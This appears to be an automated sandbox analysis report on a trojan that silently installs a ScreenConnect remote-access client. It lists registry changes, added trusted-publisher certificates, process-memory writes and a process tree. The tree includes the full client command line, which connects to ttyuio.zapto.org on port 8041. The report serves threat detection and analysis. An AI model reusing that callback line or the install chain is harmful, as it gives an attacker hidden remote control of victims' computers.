Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\lock!12000000cfd6760f0801000000070000000000000000000 = 30303030303130382c30316462313436393635653963623830	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 680074007400700073003a002f002f0063006c006f0075006400660069006c00650073002d007300650063007500720065002e0069006f002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006d0061006e00690066006500730074000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 30000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files\ScreenConnect.WindowsFileManager.exe_0e21 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 680074007400700073003a002f002f0063006c006f0075006400660069006c00650073002d007300650063007500720065002e0069006f002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e00330032000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files\ScreenConnect.WindowsFileManager.exe.conf = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Files	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb5 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\lock!0c000000cfd6760f0801000000070000000000000000000 = 30303030303130382c30316462313436393635653963623830	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\lock!010000002ad5760f10070000f8070000000000000000000 = 30303030303731302c30316462313436393565653233633030	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6 = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Files\ScreenConnect.ClientService.dll_e781b1c63 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\lock!1000000043d6760f10070000f8070000000000000000000 = 30303030303731302c30316462313436393565653233633030	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\lock!0800000043d6760f10070000f8070000000000000000000 = 30303030303731302c30316462313436393565653233633030	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e5 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\SubstructureCreated = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\lock!10000000cfd6760f0801000000070000000000000000000 = 30303030303130382c30316462313436393635653963623830	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 680074007400700073003a002f002f0063006c006f0075006400660069006c00650073002d007300650063007500720065002e0069006f002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e003f0065003d0053007500700070006f0072007400260079003d0047007500650073007400260068003d00740074007900750069006f002e007a006100700074006f002e006f0072006700260070003d003800300034003100260073003d00310033003700310033003000300064002d0063006400340065002d0034003700640036002d0039006400370032002d0061003200390031006400640039003800360034003000310026006b003d0042006700490041004100410043006b004100410042005300550030004500780041004100670041004100410045004100410051004300700044004c004a00620042003200550043004a0051005300540037004a00250032006200650041004c00340053005200780042004e00390046006e00470044006d007a0075005300530065002500320066006a0048002500320062006e004b00420065004f0051004600480051002500320062004300720033004c0079007000440031004b0053006200310037006f0052005700500034007a0056004800790037004200540035003800350079007a00490064007400450073004c004f0051004a0047005600550077007a006500490046005700610041004b0077004b006600420073004800470025003200660068003800470059005600740038003500570031006f0049005600750044003000680065004a006d004a00740071004500640063004f006a005800760058005000440034006f004a007500510048006f00710068004200620059004c006f0053006e0073006200660072005400500030005200300034003000250032006200630066006b0043004e0073006c007600750066003000310063006e0073006200630041006500790055004500460052004b0049007a0025003200620038006f00300059004a0077007200690078004500360076006400520062003500630078006e00250032006200610075005600330036006d0039003200250032006200360025003200660068004e0043003500730052007a004d00340035004800720031004600550034003700770041003400720041005200610038004f006e00410043005900610066007000330032006a00450033007400320043006d003700450045006b004d00740025003200620053003600480057004b00670061005a004d007000300056004c006b004200670050007700330057006e005000380035006600680073006c0059004e00390055007a00330045005a007400730042006e002500320066003900370043004600450032006a00530041007600340025003200620072006400670049006d00410033006e0061003800260072003d00260069003d0055006e007400690074006c0065006400250032003000530065007300730069006f006e000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_d0aeae01f8c2b957\LastRunVersion = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Assemblies	dfsvc.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1808	dfsvc.exe
Token: SeDebugPrivilege	3040	ScreenConnect.ClientService.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 2396 wrote to memory of 1808	2396	71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe	30
PID 2396 wrote to memory of 1808	2396	71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe	30
PID 2396 wrote to memory of 1808	2396	71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe	30
PID 2396 wrote to memory of 1808	2396	71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe	30
PID 1808 wrote to memory of 264	1808	dfsvc.exe	33
PID 1808 wrote to memory of 264	1808	dfsvc.exe	33
PID 1808 wrote to memory of 264	1808	dfsvc.exe	33
PID 1808 wrote to memory of 264	1808	dfsvc.exe	33
PID 264 wrote to memory of 2364	264	ScreenConnect.WindowsClient.exe	34
PID 264 wrote to memory of 2364	264	ScreenConnect.WindowsClient.exe	34
PID 264 wrote to memory of 2364	264	ScreenConnect.WindowsClient.exe	34
PID 264 wrote to memory of 2364	264	ScreenConnect.WindowsClient.exe	34
PID 3040 wrote to memory of 1472	3040	ScreenConnect.ClientService.exe	36
PID 3040 wrote to memory of 1472	3040	ScreenConnect.ClientService.exe	36
PID 3040 wrote to memory of 1472	3040	ScreenConnect.ClientService.exe	36
PID 3040 wrote to memory of 1472	3040	ScreenConnect.ClientService.exe	36
PID 3040 wrote to memory of 1472	3040	ScreenConnect.ClientService.exe	36

C:\Users\Admin\AppData\Local\Temp\71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe
"C:\Users\Admin\AppData\Local\Temp\71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe"
1⤵
- Manipulates Digital Signatures
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2396
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1808
- - C:\Users\Admin\AppData\Local\Apps\2.0\J6MP7XAC.K8J\N7XBK665.6WZ\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
    "C:\Users\Admin\AppData\Local\Apps\2.0\J6MP7XAC.K8J\N7XBK665.6WZ\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:264
  - - C:\Users\Admin\AppData\Local\Apps\2.0\J6MP7XAC.K8J\N7XBK665.6WZ\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\J6MP7XAC.K8J\N7XBK665.6WZ\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=1371300d-cd4e-47d6-9d72-a291dd986401&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2364

C:\Users\Admin\AppData\Local\Apps\2.0\J6MP7XAC.K8J\N7XBK665.6WZ\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
"C:\Users\Admin\AppData\Local\Apps\2.0\J6MP7XAC.K8J\N7XBK665.6WZ\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=1371300d-cd4e-47d6-9d72-a291dd986401&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3040
- C:\Users\Admin\AppData\Local\Apps\2.0\J6MP7XAC.K8J\N7XBK665.6WZ\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
